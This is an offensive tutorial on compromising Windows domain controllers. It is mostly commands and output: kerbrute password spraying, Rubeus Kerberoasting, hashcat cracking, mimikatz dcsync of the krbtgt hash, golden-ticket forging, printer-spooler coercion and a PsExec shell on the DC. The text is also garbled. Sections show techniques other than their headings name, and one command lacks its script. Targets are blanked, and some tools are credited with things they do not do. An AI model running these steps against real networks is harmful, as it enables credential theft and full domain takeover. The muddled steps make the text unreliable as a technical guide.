Mastering Domain Controller Exploitation: Kerberoast, Silver Tickets, and Golden Tickets

Domain Controllers are critical components of Windows Active Directory and are targeted by attackers seeking sensitive information or network control. Techniques covered include Kerberoasting, Silver Tickets, and Golden Tickets.

Kerberoasting Attack: Extracting Encrypted Kerberos Tickets

Kerberoasting is a common attack technique used to extract encrypted Kerberos tickets from a domain controller and crack them offline to obtain plaintext passwords. The attack involves requesting a service ticket for a specific user account with a known service principal name (SPN) and then extracting the encrypted ticket from the response. The extracted ticket can then be cracked using password cracking tools like Hashcat.

Assuming the targeted user account is “jsmith” and we have a list of potential passwords in a file called “passwords.txt”:

$ kerbrute spray --dc --user jsmith --passwords passwords.txt --domain

[+] Valid credentials found:   
    User     : jsmith
    Password : Password1

Kerbrute is an open-source tool that can be used to perform brute-force password spraying attacks against Active Directory user accounts. By spraying a large list of common passwords against a list of targeted user accounts, an attacker can potentially obtain access to one or more accounts with weak passwords.

$ python domain/username:password -dc-ip -request

ServicePrincipalName         Name       MemberOf                                                  PasswordLastSet             
--------------------------- ---------- -------------------------------------------------------- --------------------------- 
MSSQLSvc/server.domain.local ACCOUNT1   CN=Group1,CN=Users,DC=domain,DC=local                  2020-09-15 15:37:38.123456   
MSSQLSvc/server.domain.local ACCOUNT2   CN=Group2,CN=Users,DC=domain,DC=local                  2020-09-10 09:53:23.345678   
HOST/server.domain.local     ACCOUNT3   CN=Group3,CN=Users,DC=domain,DC=local                  2021-01-05 12:45:12.987654   

Silver Ticket Attack: Generating Forged Kerberos Tickets with Rubeus.exe and Hashcat

A Silver Ticket attack is a technique that allows an attacker to forge a Service Ticket (TGS) for a specific service without having to know the user’s password. This type of attack is useful when an attacker has limited access to the target network but has the necessary privileges to create a Service Principal Name (SPN) for a specific service.

Rubeus is a popular tool used for performing Kerberos-based attacks against Active Directory environments. One of its features is the ability to perform a Kerberoasting attack, which involves requesting and extracting the hash of a user’s service principal name (SPN) from the domain controller. This hash can then be used in offline attacks to crack the password and gain access to the user’s account.

Use Rubeus.exe to generate a Silver Ticket for a specific service account:

$ Rubeus.exe kerberoast /simple /outfile:hashes.txt

[*] Action: Kerberoasting
[*] Using rc4_hmac encryption
[+] Requesting hash for SPN MSSQLSvc/ (this may take a while)
[+] Hash collected for MSSQLSvc/
[+] Saved Kerberoast output to hashes.txt

Rubeus has successfully performed a Kerberoasting attack against the SPN MSSQLSvc/ and saved the resulting hash to the file “hashes.txt”.

$ hashcat -m 13100 -a 0 hashes.txt rockyou.txt

hashcat (v6.2.4) starting...


Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5 TGS-REP etype 23
Hash.Target......: [email protected]:1433$55b73c9d2cfe98a3...faa3
Time.Started.....: Tue Apr 12 16:27:36 2023 (1 sec)
Time.Estimated...: Tue Apr 12 16:27:37 2023 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 9317.2 kH/s (8.75ms) @ Accel:32 Loops:64 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4096/14344384 (0.03%)
Rejected.........: 0/4096 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-64
Candidates.#1....: dragonfly -> Erika1


[email protected]:1433$55b73c9d2cfe98a36f8bfb202818a06c$465e1c34e7b10d372373f56cde3d6cfe5276b54fb6b86983d66a94a336a2a2b30ffce77ac1a0d600c9654070fd2faa3:password123

The “hashes.txt” file, generated through the “Rubeus.exe kerberoast” command, contained a Kerberos hash for a user’s Service Principal (SPN). Then, using the “hashcat” tool and a password dictionary (“rockyou.txt”), the hash was cracked and the password associated with the SPN was discovered to be “password123”. With this password, an attacker could potentially authenticate as the user associated with the SPN and gain access to sensitive resources.

Golden Ticket Attack: Exploiting Kerberos with Mimikatz, Rubeus, and ms-rprn.exe

In a Golden Ticket attack, an attacker can forge a Kerberos Ticket Granting Ticket (TGT) for any domain account, giving them full access to a network’s resources. This type of attack requires access to the domain controller’s KRBTGT account password hash.

The command “.\ms-rprn.exe \dc.example.local \workstation.example.local” is invoking the ms-rprn tool to perform a printer spooler service impersonation attack. This attack allows an attacker to impersonate a printer spooler service and gain access to sensitive information, such as hashes, on a remote machine. In this case, the command is targeting a domain controller (“dc.example.local”) and a workstation (“workstation.example.local”). However, the actual result of the command will depend on the specific configuration of the target system.

.\ms-rprn.exe  \\dc.example.local \\workstation.example.local

Rubeus can perform a Golden Ticket attack. The following command can be used to obtain the KRBTGT account password hash:

Rubeus.exe harvest /interval:30 /nowrap

Mimikatz is a popular tool used for Golden Ticket attacks. The following command can be used to obtain the KRBTGT account password hash:

mimikatz.exe "lsadump::dcsync /user:krbtgt"

Once the hash has been obtained, it can be used to create a forged TGT with Mimikatz:

mimikatz # kerberos::golden / /sid:S-1-5-21-3623811015-3361044348-30300820 /rc4:1d2d8c99f64f27e7cfa863e37e56b971 /user:Administrator /id:500 /target:krbtgt /service:cifs /ptt

User     : admin\Administrator
Domain   : (example)
SID      : S-1-5-21-3623811015-3361044348-30300820
krbtgt   : yes
Ticket   : 0x8d600001b6c04200e0000000000...
Start    : 05/01/2023 13:40:16 (UTC)
End      : 05/02/2023 13:40:16 (UTC)
Renew    : 05/08/2023 13:40:16 (UTC)
Flags    : name_canonicalize, pre_authent, renewable, forwardable
Keys     : aes256_hmac, aes128_hmac, rc4_hmac_nt

The “klist” command is used to display Kerberos ticket information, including the ticket owner, ticket expiration time, and ticket encryption type. It can also be used to purge tickets from the current user’s ticket cache. This command is often used in combination with other tools, such as Mimikatz, to dump and manipulate Kerberos tickets in order to conduct various attacks, including Golden Ticket attacks.

We can see the token is loaded into the memory or not.


Current LogonId is 0:0x12345

Cached Tickets: (5)

#0>     Client: alice @ EXAMPLE.COM
        Server: krbtgt/EXAMPLE.COM @ EXAMPLE.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 4/6/2023 13:30:00 (local)
        End Time: 4/7/2023 1:30:00 (local)
        Renew Time: 4/13/2023 13:30:00 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY

#1>     Client: alice @ EXAMPLE.COM
        Server: host/ @ EXAMPLE.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 4/6/2023 13:30:00 (local)
        End Time: 4/7/2023 1:30:00 (local)
        Renew Time: 4/13/2023 13:30:00 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY

The “ps-exec.exe \dc.example.local cmd” command is used to start a command prompt shell on a remote Windows computer named “dc.example.local” using the PsExec tool from the Sysinternals Suite.

> .\ps-exec.exe \\dc.example.local cmd

PsExec v2.34 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals -

Starting cmd on dc.example.local...

C:\Windows\System32> whoami

cmd exited on dc.example.local with error code 0.